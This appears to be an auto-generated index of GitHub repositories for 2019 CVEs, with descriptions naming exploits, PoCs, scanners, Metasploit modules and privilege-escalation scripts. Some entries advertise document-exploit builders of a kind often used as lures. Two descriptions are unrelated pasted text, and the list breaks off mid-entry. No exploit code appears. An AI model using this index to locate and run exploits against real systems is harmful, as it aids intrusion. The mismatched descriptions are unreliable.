**windows.vm** : [yuehanked/cve-2019-3396](https://api.github.com/repos/yuehanked/cve-2019-3396) create time: 2020-11-17T02:01:48Z

**TPM vulnerability checking tool for CVE-2018-6622. This tool will be published at Black Hat Asia 2019 and Black Hat Europe 2019** : [kkamagui/napper-for-tpm](https://api.github.com/repos/kkamagui/napper-for-tpm) create time: 2019-02-07T06:45:27Z

**CVE-2019-15107 exploit** : [n0obit4/Webmin_1.890-POC](https://api.github.com/repos/n0obit4/Webmin_1.890-POC) create time: 2020-09-13T03:11:29Z

**PHP-FPM Remote Command Execution Exploit** : [lindemer/CVE-2019-11043](https://api.github.com/repos/lindemer/CVE-2019-11043) create time: 2020-11-18T07:25:37Z

**Script that automates the process of escalating privileges on openbsd system (CVE-2019-19520) by exploiting the xlock binary and againing it's sgid and escalating to the root user by (CVE-2019-19522) exploiting the privileges of auth group and adding keys to the Skey or Yubikey** : [retrymp3/Openbsd-Privilege-Escalation](https://api.github.com/repos/retrymp3/Openbsd-Privilege-Escalation) create time: 2020-11-21T07:30:10Z

**This container was made to explain and demonstrate how CVE-2019-15813 (Sentrifugo works)** : [wolf1892/CVE-2019-15813](https://api.github.com/repos/wolf1892/CVE-2019-15813) create time: 2020-11-22T10:35:24Z

**FreeFTPd 1.0.8 Post-Authentication Buffer Overflow via SIZE** : [cwinfosec/CVE-2019-19383](https://api.github.com/repos/cwinfosec/CVE-2019-19383) create time: 2019-11-28T18:24:02Z

**weblogic 漏洞扫描工具。目前包含对以下漏洞的检测能力:CVE-2014-4210、CVE-2016-0638、CVE-2016-3510、CVE-2017-3248、CVE-2017-3506、CVE-2017-10271、CVE-2018-2628、CVE-2018-2893、CVE-2018-2894、CVE-2018-3191、CVE-2018-3245、CVE-2018-3252、CVE-2019-2618、CVE-2019-2725、CVE-2019-2729、CVE-2019-2890、CVE-2020-2551、CVE-2020-14882、CVE-2020-14883** : [0xn0ne/weblogicScanner](https://api.github.com/repos/0xn0ne/weblogicScanner) create time: 2020-01-15T04:26:29Z

**None** : [ossf-cve-benchmark/CVE-2019-10765](https://api.github.com/repos/ossf-cve-benchmark/CVE-2019-10765) create time: 2020-11-02T20:55:08Z

**None** : [ossf-cve-benchmark/CVE-2019-10745](https://api.github.com/repos/ossf-cve-benchmark/CVE-2019-10745) create time: 2020-11-02T20:55:05Z

**None** : [ossf-cve-benchmark/CVE-2019-10061](https://api.github.com/repos/ossf-cve-benchmark/CVE-2019-10061) create time: 2020-12-01T09:18:57Z

**None** : [ossf-cve-benchmark/CVE-2019-1020012](https://api.github.com/repos/ossf-cve-benchmark/CVE-2019-1020012) create time: 2020-12-01T09:18:57Z

**None** : [ossf-cve-benchmark/CVE-2019-1010266](https://api.github.com/repos/ossf-cve-benchmark/CVE-2019-1010266) create time: 2020-12-01T09:18:57Z

**None** : [ossf-cve-benchmark/CVE-2019-10742](https://api.github.com/repos/ossf-cve-benchmark/CVE-2019-10742) create time: 2020-12-01T09:18:57Z

**None** : [ossf-cve-benchmark/CVE-2019-1010091](https://api.github.com/repos/ossf-cve-benchmark/CVE-2019-1010091) create time: 2020-12-01T09:18:57Z

**None** : [ossf-cve-benchmark/CVE-2019-10758](https://api.github.com/repos/ossf-cve-benchmark/CVE-2019-10758) create time: 2020-12-01T09:18:57Z

**None** : [ossf-cve-benchmark/CVE-2019-10757](https://api.github.com/repos/ossf-cve-benchmark/CVE-2019-10757) create time: 2020-12-01T09:18:57Z

**None** : [ossf-cve-benchmark/CVE-2019-10767](https://api.github.com/repos/ossf-cve-benchmark/CVE-2019-10767) create time: 2020-12-01T09:18:57Z

**None** : [ossf-cve-benchmark/CVE-2019-10750](https://api.github.com/repos/ossf-cve-benchmark/CVE-2019-10750) create time: 2020-12-01T09:18:57Z

**None** : [ossf-cve-benchmark/CVE-2019-10781](https://api.github.com/repos/ossf-cve-benchmark/CVE-2019-10781) create time: 2020-12-01T09:18:57Z

**None** : [ossf-cve-benchmark/CVE-2019-10761](https://api.github.com/repos/ossf-cve-benchmark/CVE-2019-10761) create time: 2020-12-01T09:18:57Z

**None** : [ossf-cve-benchmark/CVE-2019-10747](https://api.github.com/repos/ossf-cve-benchmark/CVE-2019-10747) create time: 2020-12-01T09:18:57Z

**None** : [ossf-cve-benchmark/CVE-2019-10777](https://api.github.com/repos/ossf-cve-benchmark/CVE-2019-10777) create time: 2020-12-01T09:18:57Z

**None** : [ossf-cve-benchmark/CVE-2019-10759](https://api.github.com/repos/ossf-cve-benchmark/CVE-2019-10759) create time: 2020-12-01T09:18:57Z

**None** : [ossf-cve-benchmark/CVE-2019-10775](https://api.github.com/repos/ossf-cve-benchmark/CVE-2019-10775) create time: 2020-12-01T09:18:57Z

**None** : [ossf-cve-benchmark/CVE-2019-10778](https://api.github.com/repos/ossf-cve-benchmark/CVE-2019-10778) create time: 2020-12-01T09:18:57Z

**None** : [ossf-cve-benchmark/CVE-2019-10776](https://api.github.com/repos/ossf-cve-benchmark/CVE-2019-10776) create time: 2020-12-01T09:18:57Z

**None** : [ossf-cve-benchmark/CVE-2019-10771](https://api.github.com/repos/ossf-cve-benchmark/CVE-2019-10771) create time: 2020-12-01T09:18:57Z

**None** : [ossf-cve-benchmark/CVE-2019-10746](https://api.github.com/repos/ossf-cve-benchmark/CVE-2019-10746) create time: 2020-12-01T09:18:57Z

**None** : [ossf-cve-benchmark/CVE-2019-10785](https://api.github.com/repos/ossf-cve-benchmark/CVE-2019-10785) create time: 2020-12-01T09:18:57Z

**None** : [ossf-cve-benchmark/CVE-2019-14862](https://api.github.com/repos/ossf-cve-benchmark/CVE-2019-14862) create time: 2020-12-01T09:18:57Z

**None** : [ossf-cve-benchmark/CVE-2019-14772](https://api.github.com/repos/ossf-cve-benchmark/CVE-2019-14772) create time: 2020-12-01T09:18:57Z

**None** : [ossf-cve-benchmark/CVE-2019-13127](https://api.github.com/repos/ossf-cve-benchmark/CVE-2019-13127) create time: 2020-12-01T09:18:57Z

**None** : [ossf-cve-benchmark/CVE-2019-12041](https://api.github.com/repos/ossf-cve-benchmark/CVE-2019-12041) create time: 2020-12-01T09:18:57Z

**None** : [ossf-cve-benchmark/CVE-2019-15478](https://api.github.com/repos/ossf-cve-benchmark/CVE-2019-15478) create time: 2020-12-01T09:18:57Z

**None** : [ossf-cve-benchmark/CVE-2019-15532](https://api.github.com/repos/ossf-cve-benchmark/CVE-2019-15532) create time: 2020-12-01T09:18:57Z

**None** : [ossf-cve-benchmark/CVE-2019-15782](https://api.github.com/repos/ossf-cve-benchmark/CVE-2019-15782) create time: 2020-12-01T09:18:58Z

**None** : [ossf-cve-benchmark/CVE-2019-13173](https://api.github.com/repos/ossf-cve-benchmark/CVE-2019-13173) create time: 2020-12-01T09:18:57Z

**None** : [ossf-cve-benchmark/CVE-2019-15482](https://api.github.com/repos/ossf-cve-benchmark/CVE-2019-15482) create time: 2020-12-01T09:18:57Z

**None** : [ossf-cve-benchmark/CVE-2019-11358](https://api.github.com/repos/ossf-cve-benchmark/CVE-2019-11358) create time: 2020-12-01T09:18:58Z

**None** : [ossf-cve-benchmark/CVE-2019-17495](https://api.github.com/repos/ossf-cve-benchmark/CVE-2019-17495) create time: 2020-12-01T09:18:58Z

**None** : [ossf-cve-benchmark/CVE-2019-15657](https://api.github.com/repos/ossf-cve-benchmark/CVE-2019-15657) create time: 2020-12-01T09:18:58Z

**None** : [ossf-cve-benchmark/CVE-2019-12043](https://api.github.com/repos/ossf-cve-benchmark/CVE-2019-12043) create time: 2020-12-01T09:18:57Z

**None** : [ossf-cve-benchmark/CVE-2019-15479](https://api.github.com/repos/ossf-cve-benchmark/CVE-2019-15479) create time: 2020-12-01T09:18:57Z

**None** : [ossf-cve-benchmark/CVE-2019-5444](https://api.github.com/repos/ossf-cve-benchmark/CVE-2019-5444) create time: 2020-12-01T09:18:58Z

**None** : [ossf-cve-benchmark/CVE-2019-18818](https://api.github.com/repos/ossf-cve-benchmark/CVE-2019-18818) create time: 2020-12-01T09:18:58Z

**None** : [ossf-cve-benchmark/CVE-2019-5414](https://api.github.com/repos/ossf-cve-benchmark/CVE-2019-5414) create time: 2020-12-01T09:18:58Z

**None** : [ossf-cve-benchmark/CVE-2019-19507](https://api.github.com/repos/ossf-cve-benchmark/CVE-2019-19507) create time: 2020-12-01T09:18:58Z

**None** : [ossf-cve-benchmark/CVE-2019-16763](https://api.github.com/repos/ossf-cve-benchmark/CVE-2019-16763) create time: 2020-12-01T09:18:58Z

**None** : [ossf-cve-benchmark/CVE-2019-12313](https://api.github.com/repos/ossf-cve-benchmark/CVE-2019-12313) create time: 2020-12-01T09:18:57Z

**None** : [ossf-cve-benchmark/CVE-2019-5484](https://api.github.com/repos/ossf-cve-benchmark/CVE-2019-5484) create time: 2020-12-01T09:18:58Z

**None** : [ossf-cve-benchmark/CVE-2019-5423](https://api.github.com/repos/ossf-cve-benchmark/CVE-2019-5423) create time: 2020-12-01T09:18:58Z

**None** : [ossf-cve-benchmark/CVE-2019-5413](https://api.github.com/repos/ossf-cve-benchmark/CVE-2019-5413) create time: 2020-12-01T09:18:58Z

**None** : [ossf-cve-benchmark/CVE-2019-20149](https://api.github.com/repos/ossf-cve-benchmark/CVE-2019-20149) create time: 2020-12-01T09:18:58Z

**None** : [ossf-cve-benchmark/CVE-2019-17592](https://api.github.com/repos/ossf-cve-benchmark/CVE-2019-17592) create time: 2020-12-01T09:18:58Z

**None** : [ossf-cve-benchmark/CVE-2019-15658](https://api.github.com/repos/ossf-cve-benchmark/CVE-2019-15658) create time: 2020-12-01T09:18:58Z

**None** : [ossf-cve-benchmark/CVE-2019-20174](https://api.github.com/repos/ossf-cve-benchmark/CVE-2019-20174) create time: 2020-12-01T09:18:58Z

**None** : [ossf-cve-benchmark/CVE-2019-5483](https://api.github.com/repos/ossf-cve-benchmark/CVE-2019-5483) create time: 2020-12-01T09:18:58Z

**None** : [ossf-cve-benchmark/CVE-2019-18954](https://api.github.com/repos/ossf-cve-benchmark/CVE-2019-18954) create time: 2020-12-01T09:18:58Z

**None** : [ossf-cve-benchmark/CVE-2019-18350](https://api.github.com/repos/ossf-cve-benchmark/CVE-2019-18350) create time: 2020-12-01T09:18:58Z

**None** : [ossf-cve-benchmark/CVE-2019-9844](https://api.github.com/repos/ossf-cve-benchmark/CVE-2019-9844) create time: 2020-12-01T09:18:58Z

**None** : [ossf-cve-benchmark/CVE-2019-8903](https://api.github.com/repos/ossf-cve-benchmark/CVE-2019-8903) create time: 2020-12-01T09:18:58Z

**None** : [ossf-cve-benchmark/CVE-2019-5479](https://api.github.com/repos/ossf-cve-benchmark/CVE-2019-5479) create time: 2020-12-01T09:18:58Z

**None** : [ossf-cve-benchmark/CVE-2019-16769](https://api.github.com/repos/ossf-cve-benchmark/CVE-2019-16769) create time: 2020-12-01T09:18:58Z

**None** : [diegojuan/CVE-2019-15107](https://api.github.com/repos/diegojuan/CVE-2019-15107) create time: 2020-12-03T15:43:39Z

**None** : [securifera/CVE-2019-14450](https://api.github.com/repos/securifera/CVE-2019-14450) create time: 2020-12-03T15:54:39Z

**None** : [Resery/CVE-2019-17041](https://api.github.com/repos/Resery/CVE-2019-17041) create time: 2020-12-05T07:49:11Z

**Scanner PoC for CVE-2019-0708 RDP RCE vuln** : [zerosum0x0/CVE-2019-0708](https://api.github.com/repos/zerosum0x0/CVE-2019-0708) create time: 2019-05-22T00:08:44Z

**Python script to scan for enabled OpenSLP services** : [HynekPetrak/CVE-2019-5544_CVE-2020-3992](https://api.github.com/repos/HynekPetrak/CVE-2019-5544_CVE-2020-3992) create time: 2020-12-01T13:49:26Z

**SQLi CVE-2019-5454** : [shanika04/nextcloud_android](https://api.github.com/repos/shanika04/nextcloud_android) create time: 2020-12-07T14:53:25Z

**None** : [fengziHK/CVE-2019-0230](https://api.github.com/repos/fengziHK/CVE-2019-0230) create time: 2020-08-13T13:31:52Z

**None** : [ossf-cve-benchmark/CVE-2019-10090](https://api.github.com/repos/ossf-cve-benchmark/CVE-2019-10090) create time: 2020-12-01T09:18:57Z

**None** : [ossf-cve-benchmark/CVE-2019-10744](https://api.github.com/repos/ossf-cve-benchmark/CVE-2019-10744) create time: 2020-12-01T09:18:57Z

**None** : [ossf-cve-benchmark/CVE-2019-13506](https://api.github.com/repos/ossf-cve-benchmark/CVE-2019-13506) create time: 2020-12-01T09:18:57Z

**None** : [ossf-cve-benchmark/CVE-2019-8331](https://api.github.com/repos/ossf-cve-benchmark/CVE-2019-8331) create time: 2020-12-01T09:18:58Z

**S2-059(CVE-2019-0230)** : [Al1ex/CVE-2019-0230](https://api.github.com/repos/Al1ex/CVE-2019-0230) create time: 2020-12-11T03:40:04Z

**This is a recurrence of cve-2019-9787 on Wordpress and a hash-based defense.** : [sijiahi/Wordpress_cve-2019-9787_defense](https://api.github.com/repos/sijiahi/Wordpress_cve-2019-9787_defense) create time: 2020-05-01T13:44:10Z

**None** : [soshewh97/CVE-2019-0230_Struts2S2-059](https://api.github.com/repos/soshewh97/CVE-2019-0230_Struts2S2-059) create time: 2020-12-11T18:57:14Z

**None** : [warferik/CVE-2019-3980](https://api.github.com/repos/warferik/CVE-2019-3980) create time: 2020-08-03T14:12:56Z

**version between CVE-2018-20433 and CVE-2019-5427** : [shanika04/cp30_XXE_partial_fix](https://api.github.com/repos/shanika04/cp30_XXE_partial_fix) create time: 2020-12-13T12:08:30Z

**Apache Solr 1.4 Injection to get a shell** : [xkyrage/Exploit_CVE-2019-17558-RCE](https://api.github.com/repos/xkyrage/Exploit_CVE-2019-17558-RCE) create time: 2020-12-15T04:38:06Z

**Full chain Chrome 71.0.3578.98 exploit** : [CreatePhotonW/CVE-2019-5782_CVE-2019-13768](https://api.github.com/repos/CreatePhotonW/CVE-2019-5782_CVE-2019-13768) create time: 2020-12-18T21:57:26Z

**None** : [CreatePhotonW/CVE-2019-1221](https://api.github.com/repos/CreatePhotonW/CVE-2019-1221) create time: 2020-12-18T22:28:11Z

**None** : [CreatePhotonW/CVE-2019-0752](https://api.github.com/repos/CreatePhotonW/CVE-2019-0752) create time: 2020-12-18T22:53:16Z

**Collection of PoCs created for SmarterMail < Build 6985 RCE** : [devzspy/CVE-2019-7214](https://api.github.com/repos/devzspy/CVE-2019-7214) create time: 2020-12-20T01:00:02Z

**CVE-2019-15588 靶场: RCE 命令注入漏洞** : [lyy289065406/CVE-2019-15588](https://api.github.com/repos/lyy289065406/CVE-2019-15588) create time: 2020-12-19T05:11:03Z

**https://github.com/awakened1712/CVE-2019-11932://github.com/awakened1712/CVE-2019-11932** : [BadAssAiras/hello](https://api.github.com/repos/BadAssAiras/hello) create time: 2020-12-20T13:17:19Z

**Wordpress IgniteUp plugin < 3.4.1 allows unauthenticated users to arbitrarily delete files on the webserver possibly causing DoS.** : [administra1tor/CVE-2019-17234b-Exploit](https://api.github.com/repos/administra1tor/CVE-2019-17234b-Exploit) create time: 2019-11-14T14:12:36Z

**2020 OPEN SOURCE SECURITY AND RISK ANALYSIS REPORT | synopsys.com Table of contents Introduction ................................................................................................................................................................................1 Industries represented in the 2020 OSSRA report...................................................................................................................................................................3 2020 Open Source Security and Risk Analysis ........................................................................................................................4 The need for a software bill of materials...................................................................................................................................................................................7 Open source composition of codebases audited in 2019 ..................................................................................................................................................... 7 What open source components are in use? .............................................................................................................................................................................9 Open source rules! But unpatched vulnerabilities still threaten............................................................................................13 Augmenting CVE vulnerability information with BDSAs.......................................................................................................................................................15 Digging deeper into vulnerabilities found in 2019..................................................................................................................................................................15 High-risk vulnerabilities ...............................................................................................................................................................................................................15 Setting vulnerability patching priorities....................................................................................................................................................................................18 Open source license and legal developments in 2019..........................................................................................................20 Open source license risk.............................................................................................................................................................................................................21 Licensing legal developments in 2019.....................................................................................................................................................................................23 Examining license risk in open source components.............................................................................................................................................................25 Open source components with no licenses or custom licenses ........................................................................................................................................26 Operational factors in open source use .................................................................................................................................29 Conclusion................................................................................................................................................................................32 Appendix A ....................................................................** : [phillip1978W/phill](https://api.github.com/repos/phillip1978W/phill) create time: 2020-12-22T09:14:36Z

**based on nginx 1.19.5 to fix for CVE-2018-16843, CVE-2018-16844, CVE-2019-9511, CVE-2019-9513, and CVE-2019-9516** : [flyniu666/ingress-nginx-0.21-1.19.5](https://api.github.com/repos/flyniu666/ingress-nginx-0.21-1.19.5) create time: 2020-12-22T10:16:11Z

**Webmin Exploit Scanner CVE-2020-35606 CVE-2019-12840** : [anasbousselham/webminscan](https://api.github.com/repos/anasbousselham/webminscan) create time: 2020-12-23T18:22:36Z

**None** : [RAVIPRAJ/cve-2019](https://api.github.com/repos/RAVIPRAJ/cve-2019) create time: 2020-12-27T11:21:39Z

**None** : [sinlee1/CVE-2019-0708](https://api.github.com/repos/sinlee1/CVE-2019-0708) create time: 2020-12-27T13:15:20Z

**an impacket-dependent script exploiting CVE-2019-1040** : [QAX-A-Team/dcpwn](https://api.github.com/repos/QAX-A-Team/dcpwn) create time: 2021-01-01T05:59:06Z

**CVE-2019-14900** : [shanika04/hibernate-orm](https://api.github.com/repos/shanika04/hibernate-orm) create time: 2021-01-06T13:06:45Z

**PoC of Backend HTTP Socket Poisoning, via HTTP Smuggling, presented in CVE-2019-15605 ** : [jlcarruda/node-poc-http-smuggling](https://api.github.com/repos/jlcarruda/node-poc-http-smuggling) create time: 2020-05-04T23:11:28Z

**An Attempt to Port BlueKeep PoC from @Ekultek to actual exploits** : [algo7/bluekeep_CVE-2019-0708_poc_to_exploit](https://api.github.com/repos/algo7/bluekeep_CVE-2019-0708_poc_to_exploit) create time: 2019-05-31T00:04:12Z

**CVE-2019-18655 Metasploit Module ** : [0xhuesca/CVE-2019-18655](https://api.github.com/repos/0xhuesca/CVE-2019-18655) create time: 2021-01-10T10:45:49Z

**None** : [AnasTaoutaou/CVE-2019-5420](https://api.github.com/repos/AnasTaoutaou/CVE-2019-5420) create time: 2021-01-11T19:23:01Z

**Free Best Exploit** : [exploiterkid33/Exploit-Builder-2021-Cve2019](https://api.github.com/repos/exploiterkid33/Exploit-Builder-2021-Cve2019) create time: 2021-01-14T01:51:07Z

**Silent DOC Exploit CVE-2019 Source Builder** : [exploiterkid33/Silent-DOC-Exploit-CVE-2019-Source-Builder](https://api.github.com/repos/exploiterkid33/Silent-DOC-Exploit-CVE-2019-Source-Builder) create time: 2021-01-14T01:52:56Z

**Silent DOC Exploit CVE-2019 Source Builder** : [exploiterkid33/Doc-Exploit-Builder-2021](https://api.github.com/repos/exploiterkid33/Doc-Exploit-Builder-2021) create time: 2021-01-14T02:02:25Z

**exp for CVE-2019-0887** : [t43Wiu6/CVE-2019-0887](https://api.github.com/repos/t43Wiu6/CVE-2019-0887) create time: 2021-01-14T07:49:51Z

**CuteNews 2.1.2 - CVE-2019-11447 Proof-Of-Concept** : [CRFSlick/CVE-2019-11447-POC](https://api.github.com/repos/CRFSlick/CVE-2019-11447-POC) create time: 2020-09-07T06:21:10Z

**None** : [1nteger-c/CVE-2019-8605](https://api.github.com/repos/1nteger-c/CVE-2019-8605) create time: 2021-01-15T06:12:14Z

**CVE-2019-9193 English Rewrite** : [X-x-X-0/CVE-2019-9193](https://api.github.com/repos/X-x-X-0/CVE-2019-9193) create time: 2021-01-12T19:00:25Z

**Exploit CVE 2019 11580 ** : [trikhanhhk/CVE_2019_11580](https://api.github.com/repos/trikhanhhk/CVE_2019_11580) create time: 2021-01-17T14:35:51Z

**None** : [trikhanhhk/EXPLOIT_CVE_2019_11580](https://api.github.com/repos/trikhanhhk/EXPLOIT_CVE_2019_11580) create time: 2021-01-17T14:43:54Z

**PoC for CVE-2019-8791 & CVE-2019-8792** : [ashleykinguk/Shazam-CVE-2019-8791-CVE-2019-8792](https://api.github.com/repos/ashleykinguk/Shazam-CVE-2019-8791-CVE-2019-8792) create time: 2021-01-17T18:49:54Z

**None** : [go-bi/CVE-2019-0708-EXP-Windows](https://api.github.com/repos/go-bi/CVE-2019-0708-EXP-Windows) create time: 2021-01-19T05:19:18Z

**CVE-2019-17137 POC** : [vncloudsco/CVE-2019-17137](https://api.github.com/repos/vncloudsco/CVE-2019-17137) create time: 2021-01-20T06:52:20Z

**None** : [Eremiel/CVE-2019-5420](https://api.github.com/repos/Eremiel/CVE-2019-5420) create time: 2021-01-20T15:06:58Z

**None** : [codeplutos/CVE-2019-12086-jackson-databind-file-read](https://api.github.com/repos/codeplutos/CVE-2019-12086-jackson-databind-file-read) create time: 2019-05-26T03:19:49Z

**CVE-2019-12814:Jackson JDOM XSLTransformer Gadget** : [Al1ex/CVE-2019-12814](https://api.github.com/repos/Al1ex/CVE-2019-12814) create time: 2020-05-24T04:33:55Z

**jackson unserialize** : [Al1ex/CVE-2019-12086](https://api.github.com/repos/Al1ex/CVE-2019-12086) create time: 2020-05-22T17:10:10Z

**TelerikUI Vulnerability Scanner (CVE-2019-18935)** : [becrevex/Telerik_CVE-2019-18935](https://api.github.com/repos/becrevex/Telerik_CVE-2019-18935) create time: 2020-05-17T04:22:45Z

**Heap Corruption** : [farif/cve_2019-5827](https://api.github.com/repos/farif/cve_2019-5827) create time: 2021-01-21T18:54:10Z

**None** : [Limesss/cve-2019-18683](https://api.github.com/repos/Limesss/cve-2019-18683) create time: 2020-12-31T15:40:28Z

**CVE-2019-19781 - Remote Code Execution on Citrix ADC Netscaler exploit** : [mpgn/CVE-2019-19781](https://api.github.com/repos/mpgn/CVE-2019-19781) create time: 2020-01-11T09:49:17Z

**RCE exploit for a .NET JSON deserialization vulnerability in Telerik UI for ASP.NET AJAX.** : [noperator/CVE-2019-18935](https://api.github.com/repos/noperator/CVE-2019-18935) create time: 2019-12-12T07:58:11Z

**CVE-2019-1040 with Exchange** : [Ridter/CVE-2019-1040](https://api.github.com/repos/Ridter/CVE-2019-1040) create time: 2019-06-14T11:16:03Z

**Exploit of CVE-2019-8942 and CVE-2019-8943 ** : [v0lck3r/CVE-2019-8943](https://api.github.com/repos/v0lck3r/CVE-2019-8943) create time: 2021-02-01T12:47:28Z

**CVE-2021-1994、CVE-2021-2047、CVE-2021-2064、CVE-2021-2108、CVE-2021-2075、CVE-2019-17195、CVE-2020-14756、CVE-2021-2109** : [somatrasss/weblogic2021](https://api.github.com/repos/somatrasss/weblogic2021) create time: 2021-02-04T07:03:56Z

**CVE-2019-5475 靶场: RCE 命令注入漏洞** : [lyy289065406/CVE-2019-5475](https://api.github.com/repos/lyy289065406/CVE-2019-5475) create time: 2020-12-16T14:03:16Z

**CVE-2020-3992 & CVE-2019-5544** : [dgh05t/VMware_ESXI_OpenSLP_PoCs](https://api.github.com/repos/dgh05t/VMware_ESXI_OpenSLP_PoCs) create time: 2021-02-04T15:15:22Z

**None** : [w0lfzhang/sonicwall-cve-2019-7482](https://api.github.com/repos/w0lfzhang/sonicwall-cve-2019-7482) create time: 2021-01-30T09:50:47Z

**None** : [DXY0411/CVE-2019-16113](https://api.github.com/repos/DXY0411/CVE-2019-16113) create time: 2021-02-05T06:51:51Z

**Temproot for Pixel 2 and Pixel 2 XL via CVE-2019-2215** : [Byte-Master-101/CVE-2019-2215](https://api.github.com/repos/Byte-Master-101/CVE-2019-2215) create time: 2021-02-05T06:23:28Z

**None** : [46o60/CVE-2019-3396_Confluence](https://api.github.com/repos/46o60/CVE-2019-3396_Confluence) create time: 2021-02-05T16:31:30Z

**ispy V1.0 - Eternalblue(ms17-010)/Bluekeep(CVE-2019-0708) Scanner and exploit ( Metasploit automation )** : [Cyb0r9/ispy](https://api.github.com/repos/Cyb0r9/ispy) create time: 2019-09-30T19:46:21Z

**None** : [Vulnerability-Playground/CVE-2019-1068](https://api.github.com/repos/Vulnerability-Playground/CVE-2019-1068) create time: 2021-02-04T21:40:56Z

**None** : [abdallah-elsharif/cve-2019-3396](https://api.github.com/repos/abdallah-elsharif/cve-2019-3396) create time: 2021-02-01T16:10:27Z

**None** : [MuirlandOracle/CVE-2019-15107](https://api.github.com/repos/MuirlandOracle/CVE-2019-15107) create time: 2020-11-09T21:46:57Z

**None** : [forse01/CVE-2019-17638-Jetty](https://api.github.com/repos/forse01/CVE-2019-17638-Jetty) create time: 2021-02-04T05:07:42Z

**HoneyPoC: Proof-of-Concept (PoC) script to exploit SIGRed (CVE-2020-1350). Achieves Domain Admin on Domain Controllers running Windows Server 2000 up to Windows Server 2019.** : [ZephrFish/CVE-2020-1350](https://api.github.com/repos/ZephrFish/CVE-2020-1350) create time: 2020-07-14T19:02:25Z

**Script for CVE2019_16278** : [sunnet-cyber/CVE2019_16278](https://api.github.com/repos/sunnet-cyber/CVE2019_16278) create time: 2020-12-17T10:07:56Z

**Metasploit module & Python script for CVE-2019-16405** : [TheCyberGeek/CVE-2019-16405.rb](https://api.github.com/repos/TheCyberGeek/CVE-2019-16405.rb) create time: 2019-10-18T21:50:37Z

**None** : [TheCyberGeek/CVE-2019-19369](https://api.github.com/repos/TheCyberGeek/CVE-2019-19369) create time: 2020-01-21T12:26:00Z

**None** : [forse01/CVE-2019-5413-NetBeans](https://api.github.com/repos/forse01/CVE-2019-5413-NetBeans) create time: 2021-02-04T00:02:59Z

**None** : [cdedmondson/Modified-CVE-2019-15107](https://api.github.com/repos/cdedmondson/Modified-CVE-2019-15107) create time: 2020-06-20T19:03:03Z

**Early 2019 - late 2020. R.I.P. CVE-2020-12928 https://h0mbre.github.io/RyzenMaster_CVE/#** : [ekknod/EC_PRO-LAN](https://api.github.com/repos/ekknod/EC_PRO-LAN) create time: 2020-11-10T13:08:21Z

**None** : [forse01/CVE-2019-5413-NetBeans-NoJson](https://api.github.com/repos/forse01/CVE-2019-5413-NetBeans-NoJson) create time: 2021-02-16T07:25:57Z

**CVE-2019-14899** : [stryngs/hysteria](https://api.github.com/repos/stryngs/hysteria) create time: 2020-01-18T19:05:19Z

**None** : [Eternit7/CVE-2019-1458](https://api.github.com/repos/Eternit7/CVE-2019-1458) create time: 2021-02-19T02:44:27Z

**None** : [Nicoslo/Windows-exploitation-Apache-Tomcat-8.5.19-CVE-2019-0232-](https://api.github.com/repos/Nicoslo/Windows-exploitation-Apache-Tomcat-8.5.19-CVE-2019-0232-) create time: 2021-02-20T18:38:48Z

**Full exploit code for CVE-2019-25024 an unauthenticated command injection flaw in OpenRepeater.** : [codexlynx/CVE-2019-25024](https://api.github.com/repos/codexlynx/CVE-2019-25024) create time: 2021-02-19T15:05:37Z

**None** : [Nicoslo/Windows-Exploitation-Web-Server-Tomcat-8.5.39-CVE-2019-0232](https://api.github.com/repos/Nicoslo/Windows-Exploitation-Web-Server-Tomcat-8.5.39-CVE-2019-0232) create time: 2021-02-21T16:56:25Z

**None** : [lsw29475/CVE-2019-17026](https://api.github.com/repos/lsw29475/CVE-2019-17026) create time: 2021-02-24T13:18:54Z

**PostgreSQL Remote Code Executuon** : [wkjung0624/CVE-2019-9193](https://api.github.com/repos/wkjung0624/CVE-2019-9193) create time: 2020-02-12T00:17:58Z

**None** : [AndyFeiLi/-CVE-2019-7214](https://api.github.com/repos/AndyFeiLi/-CVE-2019-7214) create time: 2021-03-01T14:09:02Z

**Files for 2019-18935** : [Un4gi/CVE-2019-18935](https://api.github.com/repos/Un4gi/CVE-2019-18935) create time: 2020-07-02T13:38:56Z

**MS CVE 2019-0708 Python Exploit** : [Kinesys/Kinesys-CVE-2019-0708-Exploit](https://api.github.com/repos/Kinesys/Kinesys-CVE-2019-0708-Exploit) create time: 2021-03-07T12:35:29Z

**Drupal RCE CVE Python Exploit** : [Kinesys/Kinesys-CVE-2019-6340](https://api.github.com/repos/Kinesys/Kinesys-CVE-2019-6340) create time: 2021-03-07T18:44:49Z

**NOTICE This repository contains the public FTC SDK for the SKYSTONE (2019-2020) competition season. If you are looking for the current season's FTC SDK software, please visit the new and permanent home of the public FTC SDK: FtcRobotController repository Welcome! This GitHub repository contains the source code that is used to build an Android app to control a FIRST Tech Challenge competition robot. To use this SDK, download/clone the entire project to your local computer. Getting Started If you are new to robotics or new to the FIRST Tech Challenge, then you should consider reviewing the FTC Blocks Tutorial to get familiar with how to use the control system: FTC Blocks Online Tutorial Even if you are an advanced Java programmer, it is helpful to start with the FTC Blocks tutorial, and then migrate to the OnBot Java Tool or to Android Studio afterwards. Downloading the Project If you are an Android Studio programmer, there are several ways to download this repo. Note that if you use the Blocks or OnBot Java Tool to program your robot, then you do not need to download this repository. If you are a git user, you can clone the most current version of the repository: git clone https://github.com/FIRST-Tech-Challenge/SKYSTONE.git Or, if you prefer, you can use the "Download Zip" button available through the main repository page. Downloading the project as a .ZIP file will keep the size of the download manageable. You can also download the project folder (as a .zip or .tar.gz archive file) from the Downloads subsection of the Releases page for this repository. Once you have downloaded and uncompressed (if needed) your folder, you can use Android Studio to import the folder ("Import project (Eclipse ADT, Gradle, etc.)"). Getting Help User Documentation and Tutorials FIRST maintains online documentation with information and tutorials on how to use the FIRST Tech Challenge software and robot control system. You can access this documentation using the following link: SKYSTONE Online Documentation Note that the online documentation is an "evergreen" document that is constantly being updated and edited. It contains the most current information about the FIRST Tech Challenge software and control system. Javadoc Reference Material The Javadoc reference documentation for the FTC SDK is now available online. Click on the following link to view the FTC SDK Javadoc documentation as a live website: FTC Javadoc Documentation Documentation for the FTC SDK is also included with this repository. There is a subfolder called "doc" which contains several subfolders: The folder "apk" contains the .apk files for the FTC Driver Station and FTC Robot Controller apps. The folder "javadoc" contains the JavaDoc user documentation for the FTC SDK. Online User Forum For technical questions regarding the Control System or the FTC SDK, please visit the FTC Technology forum: FTC Technology Forum Release Information Version 5.5 (20200824-090813) Version 5.5 requires Android Studio 4.0 or later. New features Adds support for calling custom Java classes from Blocks OpModes (fixes SkyStone issue #161). Classes must be in the org.firstinspires.ftc.teamcode package. Methods must be public static and have no more than 21 parameters. Parameters declared as OpMode, LinearOpMode, Telemetry, and HardwareMap are supported and the argument is provided automatically, 